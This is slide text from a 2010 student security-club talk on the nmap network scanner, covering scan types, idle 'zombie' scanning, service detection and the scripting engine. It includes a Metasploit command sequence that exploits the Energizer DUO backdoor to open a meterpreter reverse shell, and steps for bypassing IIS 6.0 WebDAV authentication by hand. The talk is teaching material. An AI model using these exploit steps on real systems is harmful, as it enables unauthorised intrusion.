1. 4/13/2010

2.  CSS Meeting  Stephen Crane on Programming Contests  Tomorrow @ 1pm  Building 8 room 345 05/11/10

3.  CSS Programming Contest  Friday @ 1pm  CS Lab, Building 8 05/11/10

4.  CBARN!  Buy your tickets today! ▪ $30  Great food!  Learn more about other clubs and the College of Business  This Friday @ 7pm 05/11/10

5.  Programming Contest 05/11/10

7.  “Network Mapper” (scanner)  Discovery  Identification  Security Auditing 05/11/10

8.  Scan types  Ping:-sP  TCP:-sT  UDP:-sU  SYN:-sS  Idle:-sI 05/11/10

9.  Ping:-sP  Checks 80, 443 and icmp if root  Good way to map the machines on the network 05/11/10

10.  TCP:-sT  TCP Connect scan  Full TCP handshake  Very “noisey” 05/11/10

11.  UDP:-sU  Gives port info only  Often forgotten  SLOW 05/11/10

12.  SYN:-sS  “half open” scanning  “quiet” scan  Most IDS are on the look out for it 05/11/10

13.  Idle:-sI  Zombie scanning  Scans a machine using another  As far as the scanned machine knows, our computer never communicated with it  Only located ports, no version info  Doesn’t spoof mac address 05/11/10

14. Advanced Features  Version information (-sV)  Attempts to identify the version of the discovered service  Can make mistakes  OS Detection (-O)  More or less accurate  Can make mistakes

15. Advanced Features  Verbosity (-v[vv])  Gives more info  Very useful  grep is your friend  Runtime interaction  v/V:Adjust verbosity  Spacebar: Print status message

16.  Idle:-sI 05/11/10 Target Zombie Us

17. Demo

18.  Scripting engine  Custom written scans  Vulnerability scanning & exploitation (kinda)  Written in LUA 05/11/10

19.  Two types:  Service scripts  Host scripts  Nine categories  Auth  Default  Discovery  External  Intrusive  Malware  Safe  Version  Vuln 05/11/10

20.  Scripts location:  /usr/share/nmap/scripts  /usr/local/share/nmap/scripts  C:\Program Files\Nmap\scripts  nmap –script-updatedb  Command format:  nmap --script= target 05/11/10

21. Scripts  Energizer Trojan  IIS webDAV

22. Energizer Trojan Script  A backdoor was found in the Energizer Charger program  Might have been a mistake  We don't really care  Listens on port 7777 of the infected machine  Detection is now built-in to version scan  nmap -sV -p7777 target

23. Energizer Trojan Script  Metasploit!  Metasploit has a module that will exploit the trojan > use exploit/windows/backdoor/energizer_duo_payloa d > set rhost target.ip > set payload windows/meterpreter/reverse_tcp > set lhost your.ip > exploit

24. IIS WebDAV script  WebDAV allows users on a website to modify files on the webserver  A vulnerability was found in IIS 6.0 WebDAV implementation  Allows remote authentication bypass due to a parsing error of UNICODE characters  Nmap has a script!

25. IIS WebDAV script  The script can identify vulnerable files on the webserver  nmap --script http-iis-webdav-vuln.nse target

26. IIS WebDAV script  Let's exploit it manually  The vulnerable server improperly parses the UNICODE character '/' (0xc0 0xaf)  We'll use telnet to exploit

27. Extra Stuff  “default” script scan (-sC)  Scans using a bunch of different scripts  Very noisy, very intrusive  Gives you a lot of info  “Aggressive” scan (-A)  Uses -O -sV -sC --traceroute  Again, very noisy  But lots and lots of info

28. Closing remarks  nmap is a tool you should be familiar with  There are many more techniques and scans that I did not cover  Be mindful of who you are scanning (and any laws regarding scans)

29. Questions?

30. References  Nmap main site  www.nmap.org www.nmap.org  nmap.org/book/nse.html  Comprehensive Guide to nmap  http://www.networkuptime.com/nmap/index.sht ml http://www.networkuptime.com/nmap/index.sht ml  SkullSecurity  http://www.skullsecurity.org/ http://www.skullsecurity.org/  WebDAV  http://www.exploit-db.com/exploits/8704 http://www.exploit-db.com/exploits/8704  Energizer Trojan  http://www.skullsecurity.org/blog/?p=563